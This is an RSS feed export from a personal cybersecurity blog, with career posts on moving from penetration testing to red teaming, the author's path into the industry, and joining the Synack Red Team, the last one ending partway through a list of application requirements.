<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Flaviu Popescu]]></title><description><![CDATA[Thoughts, stories and ideas.]]></description><link>https://flaviu.io/</link><image><url>https://flaviu.io/favicon.png</url><title>Flaviu Popescu</title><link>https://flaviu.io/</link></image><generator>Ghost 4.48</generator><lastBuildDate>Tue, 23 Jun 2026 19:33:00 GMT</lastBuildDate><atom:link href="https://flaviu.io/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[From Pentester to Red Teamer: Navigating the Skills Needed for the Transition]]></title><description><![CDATA[<p>If you&apos;re already in the cybersecurity field or looking to break in, you&apos;ve probably noticed that the industry is constantly shifting. It&apos;s an endless game of cat and mouse between defenders and attackers. Many cybersecurity professionals start their journey as penetration testers (pentester), tasked</p>]]></description><link>https://flaviu.io/from-pentester-to-red-teamer-navigating-the-skills-needed-for-the-transition/</link><guid isPermaLink="false">6720f4d29fbe8f3c5b3f5429</guid><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Wed, 30 Oct 2024 07:00:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1522426266214-ec2d2abb9ce0?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDEwfHxqb3VybmV5fGVufDB8fHx8MTczMDIzMTEyOHww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1522426266214-ec2d2abb9ce0?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDEwfHxqb3VybmV5fGVufDB8fHx8MTczMDIzMTEyOHww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" alt="From Pentester to Red Teamer: Navigating the Skills Needed for the Transition"><p>If you&apos;re already in the cybersecurity field or looking to break in, you&apos;ve probably noticed that the industry is constantly shifting. It&apos;s an endless game of cat and mouse between defenders and attackers. Many cybersecurity professionals start their journey as penetration testers (pentester), tasked with identifying vulnerabilities in networks, systems, or applications. But for those looking to move from finding holes in security to simulating real adversarial attacks, the jump to red teaming is a big one.</p><p>It&apos;s not just a &#x201C;level up&#x201D;, it&apos;s a mindset shift, a deeper technical dive, and a move into a role that looks at security from every angle.</p><hr><h3 id="pentester-vs-red-teamer-whats-the-difference"><strong>Pentester vs. Red Teamer: What&apos;s the Difference?</strong></h3><p>As a <strong><em>Pentester</em></strong>, your main focus is on identifying vulnerabilities in a controlled, often isolated, environment. You typically work through a structured process, using a well defined methodology like OWASP for web applications or other vulnerability frameworks. The aim is to highlight weaknesses and deliver specific recommendations to improve security. This means pentesters are very methodical, targeting specific systems or applications for a focused assessment.</p><p>In contrast, a <strong><em>Red Teamer</em></strong> operates more like a real-world adversary. Instead of finding vulnerabilities, you&apos;re simulating actual attack scenarios to understand how far an attacker could get and how well an organisation can detect and respond. It&apos;s not just technical systems you&apos;re assessing, but there full defensive posture, including people, processes, and detection capabilities. Red teaming requires pentesting skills but adds in a whole other layer, you&apos;re emulating threats, using adversary tactics, and focusing on stealth to see if you can fly under the radar.</p><h3 id="how-a-pentesters-skillset-evolves-for-red-teaming"><strong>How a Pentester&apos;s Skillset Evolves for Red Teaming</strong></h3><p>May red teamers start with a strong penetration testing background, so the jump to red teaming builds on those foundational skills. Here&apos;s how key skills evolve from pentesting to red teaming:</p><h4 id="1-exploitation-techniques-basic-to-advanced"><strong>1. Exploitation Techniques: Basic to Advanced</strong></h4><p><strong>Pentester</strong>: As a pentester, you&apos;re comfortable with common exploitation techniques, usually leveraging tools like Metasploit or Burp Suite to uncover and exploit web or network vulnerabilities.</p><p><strong>Red Teamer</strong>: In red teaming, the game changes. You&apos;re moving into more advanced exploitation, covering a wider range of systems and techniques. Tools like Cobalt Strike are essential, and you&apos;ll be simulating sophisticated attacks, including advanced payloads and lateral movement tactics to mimic high-level threats.</p><h4 id="2-command-and-control-c2-frameworks-building-persistence"><strong>2. Command and Control (C2) Frameworks: Building Persistence</strong></h4><p><strong>Pentester</strong>: In pentesting, persistence isn&apos;t always a priority. You find a vulnerability, exploit it, and report the results.</p><p><strong>Red Teamer</strong>: Persistence is critical. You&apos;re establishing and maintaining C2 communications while evading detection, much like real-world attackers. Familiarity with frameworks like Mythic and Posh C2 enables you to test defenses and remain hidden, mimicking the stealth and persistence of sophisticated threat actors.</p><h4 id="3-adversary-emulation-beyond-finding-vulnerabilities"><strong>3. Adversary Emulation: Beyond Finding Vulnerabilities</strong></h4><p><strong>Pentester</strong>: Your focus is on vulnerabilities - identifying and exploiting them in a technical, structured approach.</p><p><strong>Red Teamer</strong>: Red teaming means stepping into an attacker&apos;s shoes. You&apos;re no longer just finding vulnerabilities, you&apos;re emulating the behavior of threat actors. Frameworks like MITRE ATT&amp;CK become essential, letting you build scenarios that test the full extent of an organisation&#x2019;s detection and response.</p><h4 id="4-social-engineering-techniques-expanding-the-attack-surface"><strong>4. Social Engineering Techniques: Expanding the Attack Surface</strong></h4><p><strong>Pentester</strong>: Pentesting is usually limited to technical testing and doesn&apos;t often include social engineering, though phishing simulations might sometimes be included.</p><p><strong>Red Teamer</strong>: Red teaming takes on social engineering in full force. Phishing, pretexting, or even physical intrusion are tactics you&apos;ll employ, testing an organisation&apos;s human defenses along with its technical controls.</p><h4 id="5-reporting-and-communication-skills-tailoring-the-message"><strong>5. Reporting and Communication Skills: Tailoring the Message</strong></h4><p><strong>Pentester</strong>: As a pentester, your reports focus on technical findings and remediation steps for each identified vulnerability. Clear communication is important but typically stays within technical teams.</p><p><strong>Red Teamer</strong>: For a red teamer, reporting is more strategic and narrative-based. You&apos;re documenting attack paths, impact, and the organisation&apos;s response gaps. This means translating technical jargon into clear risks and actions for both technical and executive audiences, offering insights that help teams strengthen security holistically.</p><h3 id="soft-skills-and-mindset-the-core-of-red-teaming"><strong>Soft Skills and Mindset: The Core of Red Teaming</strong></h3><p>For both roles, technical expertise is vital, but moving into red teaming means enhancing your soft skills too. Communication, collaboration, and a proactive, strategic mindset are key. Red teamers work closely with different stakeholders, often mentoring junior staff and contribute to broader security awareness. These skills are what help bridge the gap between finding vulnerabilities and building an organisation wide defensive posture.</p><h3 id="from-pentester-to-red-teamer-embracing-the-challenge"><strong>From Pentester to Red Teamer: Embracing the Challenge</strong></h3><p>Transitioning from pentesting to red teaming is an exciting and challenging move that broadens your view of cyber security. By building on the technical skills of a pentester and developing a strategic, adversary-focused mindset, you&apos;re positioning yourself to make a real impact in an organisation&apos;s security. Red teaming isn&apos;t just a job, it&apos;s a commitment to <em>pushing defenses to their limit</em> and ensuring resilience against real world threats.</p><p>If you&apos;re ready to take on this challenge, embrace the complexity and step confidently into a role where you&apos;ll learn, adapt, and continuously test your mettle. The journey from pentester to red teamer is one of growth, resilience, and an ever-deepening understanding of security.</p><p> So dive in and start exploring, you&apos;re in for a rewarding, dynamic career that&apos;s anything but ordinary.</p>]]></content:encoded></item><item><title><![CDATA[Penetration Tester Interview Questions Guide]]></title><description><![CDATA[Penetration Tester Interview Questions Guide]]></description><link>https://flaviu.io/penetration-tester-interview-questions-guide/</link><guid isPermaLink="false">671ac0bfc03bbe1a70e5094c</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[Getting Started]]></category><category><![CDATA[learning]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Fri, 25 Oct 2024 12:14:53 GMT</pubDate><content:encoded/></item><item><title><![CDATA[Stepping into Cyber - My Story]]></title><description><![CDATA[<p>Because &quot;<strong>Breaking into Cyber</strong>&quot; is overrated. :)</p><hr><p>Anyone with a LinkedIn profile and interested in the Cyber security industry would have come across a post with a statement such as &apos;How do I find an entry level role in Cyber security&apos; and more often than not, the</p>]]></description><link>https://flaviu.io/stepping-into-cyber-my-story/</link><guid isPermaLink="false">65463f58a5405f0539236075</guid><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 29 Jan 2024 12:00:00 GMT</pubDate><media:content url="https://flaviu.io/content/images/2024/01/irc.PNG" medium="image"/><content:encoded><![CDATA[<img src="https://flaviu.io/content/images/2024/01/irc.PNG" alt="Stepping into Cyber - My Story"><p>Because &quot;<strong>Breaking into Cyber</strong>&quot; is overrated. :)</p><hr><p>Anyone with a LinkedIn profile and interested in the Cyber security industry would have come across a post with a statement such as &apos;How do I find an entry level role in Cyber security&apos; and more often than not, the reply in the comments section is <strong><em>&apos;Cyber security is not and entry level job&apos;</em></strong>. Some argue, that there are always ways to enter the industry such as undertaking an IT help desk job and others will say that there are entry-level roles, such as junior or apprentice (they&apos;re just few and far between). As someone who did neither, I thought I would share my own experience with landing that first role as a mid-level Penetration Tester in the industry.</p><p>My background has been very much learn what you can from where you can. This journey of self learning started from a very young age. Malcolm Gladwell said it takes 10,000 hours to learn a new skill, however recently Josh Kaufman disproved this theory stating that it takes 20 hours not 10,000. I am by no means saying you can learn cyber security in 20 hours maybe just not as much as 10,000. When someone asks me what is takes to land a job in cyber the answer is passion, <strong><em>(more passion, more energy)</em></strong> you may be rolling your eyes and thinking clich&#xE9; but it&apos;s true. Cyber security no matter what the role, is a rabbit hole deeper than you can ever imagine. You have to have the passion and interest to engage in the subject and tumble down that rabbit hole faster than Alice.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" class="kg-image" alt="Stepping into Cyber - My Story" loading="lazy" width="2812" height="2812" srcset="https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=600 600w, https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1000 1000w, https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1600 1600w, https://images.unsplash.com/photo-1624685088175-0bf8b42c78ad?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDJ8fGFsaWNlJTIwd29uZGVybGFuZCUyMGhvbGV8ZW58MHx8fHwxNjk5MTAyOTc0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2400 2400w" sizes="(min-width: 720px) 720px"><figcaption>Photo by Meghan Hessler</figcaption></figure><p>Back in the early 2000s my teenage years were spent in my room on the computer but back then there weren&apos;t so many social media platforms like Twitter(X), Facebook, TikTok, &#xA0;it was internet relay chat (IRC) and that&apos;s where I became interested in Cyber and the possibilities that it posed. Of course, at that age it&apos;s not the security side that interests you as the chat groups were commandeered by Black Hat hackers, in a way as a young teenager it was like being in a room full of grown-ups talking about things kids shouldn&apos;t hear, and I was there hiding in the darkness of the chatroom, invisible, listening.</p><p>That was where I learned about security vulnerabilities, what they were and how to exploit them which is what others seem to be doing and on a mass scale for fun at that. I also learned how to secure vulnerabilities as when a hacker got hold of a server, they wanted to secure it and protect it from other hackers, this double-sided sword taught me the basis and fundamentals of Cyber security just not in the traditional sense.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" class="kg-image" alt="Stepping into Cyber - My Story" loading="lazy" width="5864" height="3922" srcset="https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=600 600w, https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1000 1000w, https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1600 1600w, https://images.unsplash.com/photo-1603302576837-37561b2e2302?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDIyMnx8Y3liZXIlMjBzZWN1cml0eXxlbnwwfHx8fDE2OTkxMDMxMTB8MA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2400 2400w" sizes="(min-width: 720px) 720px"><figcaption>Photo by Joshua Woroniecki</figcaption></figure><p>Growing up in Romania we didn&apos;t have access to as much as other Western Countries, so I spent most of my time online and for years that is what I did. I quickly learned various sides of Cyber security, my love for Linux terminals was set in stone. I travelled to several countries such as Spain, Greece, Germany where I resided for several years but wherever I went so did my computer (and internet connection however stable) enabling me to have one foot in the virtual world no matter where in the world I was.</p><p>You&apos;re always told that if you want a career you need an education. Be that in the form of a college Diploma or University Degree. I chose the latter. I will admit this is the only reason that I went to university was for a job. For me university wasn&apos;t stimulating as what we were being taught I already knew, I was for the most part going through the motions. My real cyber education was at home, doing what I did best, learning on my own.</p><p>Hungry in my quest for knowledge I was on every platform you could imagine. Try Hack Me wasn&apos;t as challenging so I tried Immersive Labs and then Hack the Box. This is where I obtained Guru level, top 10 UK and top 50 Worldwide. The novelty of solving challenges soon wore off and I was ready for experiencing real world vulnerabilities.</p><p>Vulnerability disclosure programs are fantastic, companies allow testers to test their web applications, external infrastructure and disclose anything they may find. I started doing disclosures for the top companies and organisations in the world, however it is very easy to step over the line and this can become problematic. You may ask yourself, why? Well, because it&apos;s very easy to step out of scope and wonder into areas that are not part of the vulnerability disclosure program.</p><p>I loved the real work experience and wanted to continue, and for that I joined Synack (SRT). I feel the combination of the three is what ultimately landed me my first role as a Cyber Security Consultant (Penetration Tester).</p><p>Try Hack Me paved the way for Hack The Box and Hack The Box helped with passing Synack&apos;s vetting process. Synack is where I gained some real world experience, In my opinion, some of the best penetration testers or red teamers come from a bug bounty and black hat background. This is because they have a different way of thinking. It takes a creative and infinitely curious mind to figure out new ways to break into a system, bypass security mechanisms, or use known vulnerabilities in novel ways. This is particularly true since the obvious ways into a system are undoubtedly blocked first.</p><p>While creativity is undeniably vital in hacking, it doesn&apos;t stand alone as the sole mental attribute ensuring success. In reality, there&apos;s a distinct trait that sets accomplished hackers apart from the less skilled.</p><p>That crucial attribute is systemising, or the ability to build systems and understand them. As per <a href="https://www.sciencedaily.com/releases/2016/06/160601111353.htm" rel="noopener noreferrer">research</a> in Frontiers in Human Neuroscience, a positive correlation exists between systemising and general hacking skills. This correlation frequently leads to a comprehensive grasp of systems extending beyond those confined to computers. For hackers, mastering this trait is of paramount importance.</p><p>Synack and other bug bounty platforms can enable you to test your skills on real world organisations and gain experience. I spent a month getting used to their processes and submitted several vulnerabilities for which I got paid almost instantly. Going through this process also taught me the importance of staying within the scope of a program to precision and writing high quality reports showing the risks posed to the organisation. I would also say that writing blogs helped, this may seem insignificant, but blogs are becoming more like portfolios of work rather than Dear Deirdre. When you have to explain to an audience you have to know the ins and outs of the subject to a high level. This became home to all the vulnerability disclosures I completed and articles relating to interesting finds. I often notice job seekers struggle to land a job in Cybersecurity because they don&apos;t have experience. You just have to find your own way to showcase your skills to a potential employer and by this increase your chances of getting employed.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" class="kg-image" alt="Stepping into Cyber - My Story" loading="lazy" width="3000" height="2000" srcset="https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=600 600w, https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1000 1000w, https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1600 1600w, https://images.unsplash.com/photo-1457365050282-c53d772ef8b2?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDE3fHxyb2NrZXR8ZW58MHx8fHwxNjk5MTAzNDI0fDA&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2400 2400w" sizes="(min-width: 720px) 720px"><figcaption>Photo by SpaceX</figcaption></figure><p>Believe it or not this article was meant to be about my first two years as a Consultant in Cyber Security (Penetration tester), but as you have read it turned out more about my journey and landing a full-time Cybersecurity Consultant job with no prior experience or certificates other than what I&apos;ve discussed above.</p><p>Last words of wisdom, please don&apos;t set up your LinkedIn profile the day after you graduate. Network, share your knowledge, and so on &#x2013; long before you&apos;re ready to look for a job.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2000" class="kg-image" alt="Stepping into Cyber - My Story" loading="lazy" width="5955" height="3350" srcset="https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=600 600w, https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1000 1000w, https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1600 1600w, https://images.unsplash.com/photo-1498084393753-b411b2d26b34?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=M3wxMTc3M3wwfDF8c2VhcmNofDExfHxuZXR3b3JrfGVufDB8fHx8MTY5OTEwMzUyOXww&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=2400 2400w" sizes="(min-width: 720px) 720px"><figcaption>Photo by Marc-Olivier Jodoin</figcaption></figure><hr><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thanks for reading my article, until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Synack Red Team Member]]></title><description><![CDATA[Bug bounty programs were created 10-15 years ago by companies like Google, Mozilla, Facebook, they were basically created to help them uncover the security vulnerabilities that would ultimately lead to a major data breach. ]]></description><link>https://flaviu.io/synack-red-team-member/</link><guid isPermaLink="false">60f14d8ae056bf37bb0e6ff1</guid><category><![CDATA[bugbounty]]></category><category><![CDATA[cybersecurity]]></category><category><![CDATA[offensivesecurity]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Sun, 12 Sep 2021 18:51:00 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/09/syn.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://flaviu.io/content/images/2021/09/syn.jpg" alt="Synack Red Team Member"><p>I&apos;ve glad to share that I am finally a member of <a href="https://www.synack.com/red-team/">Synack Red Team</a>. My actual offical joining date is 26/8/2021. It was a long process but very satisfying in the end. Tune in if you would like to know more about the journey!</p><blockquote><strong>Theodore Roosevelt</strong>: Nothing worth having comes easy.</blockquote><hr><p><em>This article is not sponsored by Synack or HackTheBox.</em></p><h3 id="introduction">Introduction</h3><hr><p>Bug bounty programs were created 10-15 years ago by companies like Google, Mozilla, Facebook, they were basically created to help them uncover the security vulnerabilities that would ultimately lead to a major data breach. They opened up their environments to the world and said: &quot;If you are able to find a vulnerability in one of our environments we will pay you, and we will pay you based on the impact and severity of that vulnerability.&quot;</p><h3 id="about-synack">About Synack</h3><hr><p>As Jay Kaplan Cofounder &amp; CEO Synack said &quot;Synack is the company that the world&apos;s largest corporations and government agencies turn to read their applications and networks of critical vulnerabilities, their customers range from the largest global 2000 companies, the world&apos;s leading banks, retailers, and health care organisations, they represent over a trillion dollars in assets, as well major federal agencies including the dept. of defence, dept. of energy, health and human services, they work with 18 different federal agencies today. They leverage a network of over 1500 of the most elite ethical hackers from 82 countries who are on the hunt for potential fatal vulnerabilities while utilising technology to make those hackers smarter and infinitely more skillable.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-10.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1687" height="1457" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-10.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-10.png 1000w, https://flaviu.io/content/images/size/w1600/2021/07/image-10.png 1600w, https://flaviu.io/content/images/2021/07/image-10.png 1687w" sizes="(min-width: 720px) 720px"><figcaption>Synack logo Src: Synack</figcaption></figure><p>The word <strong><strong>hacker</strong> </strong>[ <strong>hak</strong>-er ] traditionally has carried a pretty negative connotation and generally think of a hacker as a person wearing a hoodie, sitting in their parents dark basement and hacking by night and sleeping during the day. The reality is most of these really good hackers are true professional, they have normal 9 to 5 jobs working at some of the biggest companies in the world. The way we perceive them vs the way the look in reality is sometimes different.</p><p>There are several hackers that have passed a million dollar mark with Synack in terms of total money taking home over the past several years, so the ability to earn a substantial amount of money is real. Some hackers may earn several hundred dollars for finding low hanging fruit vulnerabilities or even completing &quot;a mission&quot;; is what they call at Synack, which is a task set up by Synack for researchers then they pick the mission, once completed they will be paid for it.</p><p>An example of a mission: It could be looking for Cross site scripting within the scope that they provide.</p><p>They will pay based on the category of the issue that the researcher finds, and the data that is ultimately exposed, all of that is fed into a calculation to determinate how much to pay the security researcher. Some people have shifted from their normal daily jobs to work full time on Synack.</p><p>Synack is kind of the Uber for Cyber Security with a lot more security controls in place, they aren&apos;t about big numbers of researchers, they are about the best of the best that&apos;s why they have a 10% acceptance rate of who they take into their community. They are really focus on people who are productive, they actively manage their community and make sure that those who are working with them are productively finding vulnerabilities and providing vulnerabilities to their customers.&quot;</p><h3 id="srt-member-s-statements">SRT Member&apos;s Statements</h3><hr><p>Jennifer Villareal Ethical Hacker at Synack said &quot;If you are a person who would rather not sit around and watch movies, if you&apos;d rather be participating in something puzzle-like, and learning something that can make you money. People&apos;s privacy and national security may also be good motivation.&quot;</p><p>Jonnathan Villareal Ethical Hacker at Synack said &quot;It&apos;s the coolest thing to ever to hack and get paid for it, and of course not going to jail is a huge plus too.<br>The satisfaction of knowing that you contributed to make something secure, if you can&apos;t break it and some of the best hackers can&apos;t break it today, means that people relying on these services can use them reliability and securely and there is a bit of pride to that as well.&quot;</p><p>Cyber criminals are hiding hard during the Covid19 pandemic and the crowdsource security testing model is essential for helping these organisation defend themselves especially when traditional security teams can&apos;t even get into the office.</p><p>Cyber Security is one of these industries where companies have been very sensitive and been against the idea of remote work but obviously that is changing in big way today.</p><p>Right now companies are trying to push new environments, new applications, new websites as fast as they can so they need a solution that allows them to thoroughly test these environments in a highly rapid manner.</p><h3 id="how-synack-gets-the-world-best-ethical-hackers">How Synack gets the world best ethical hackers</h3><hr><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-13.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1054" height="354" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-13.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-13.png 1000w, https://flaviu.io/content/images/2021/07/image-13.png 1054w" sizes="(min-width: 720px) 720px"><figcaption>Synack Src: Synack</figcaption></figure><p>Earning a spot on the Synack Red Team (SRT) is a pinnacle achievement in the career of the world&apos;s best security researchers, Synack has the most strict entrance criteria in the industry. Synack keep average hackers Out, even many above hackers won&apos;t make it to the SRT, uniquely Synack regularly removes SRT members each year, companies aren&apos;t exposed to ineffective testers protecting them in ways bug bounty platforms don&apos;t. This way their customers get the best of the best. The SRT members are incentivised to find unknown, high severity vulnerabilities in their customer&apos;s systems before these vulns will cause problems for the business. The SRT use Synack&apos;s platform to narrow in on critical vulnerabilities other solutions struggled to find, with Synack&apos;s proprietary scanning technology they can be more efficient than unassisted hackers seeking bug bounties on other platforms. Synack testing is also safer for companies with constant measurement, analytics and monitoring. Synack motivate the SRT members to do the best hacking including a Hall of Honour, The &quot;<strong><a href="https://acropolis.synack.com/">Synack Acropolis</a></strong>&quot;, they continue to motivate the SRT as they climb the ranks. And finally to attract there are opportunities to travel, adventure and hack for Synack at destination events - all to protect their customers around the world.</p><h3 id="about-the-journey">About the Journey</h3><hr><h3 id="entry-point-1">Entry Point 1</h3><p>There are two main ways to join the SRT, one of which is through their main website and through hackthebox tracks. The power behind the Synack platform is an elite team of the world&apos;s top cybersecurity researchers&#x2014;drawn from over 80 countries, recruited for their skill, and chosen based on trust. &#xA0;(<a href="https://boards.greenhouse.io/synacksrt/jobs/150860?ref=synack">Apply</a>). You will have to fill a form with as much information to show Synack your worth, this includes:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-14.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="770" height="433" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-14.png 600w, https://flaviu.io/content/images/2021/07/image-14.png 770w" sizes="(min-width: 720px) 720px"><figcaption>Entry Points</figcaption></figure><!--kg-card-begin: markdown--><p>Bug bounty experience (public / private) <em>must list any public profile links</em><br>
Job descriptions with detailed responsibilities<br>
Relevant industry certifications<br>
Industry/conference speaking experience<br>
Any attributed CVEs</p>
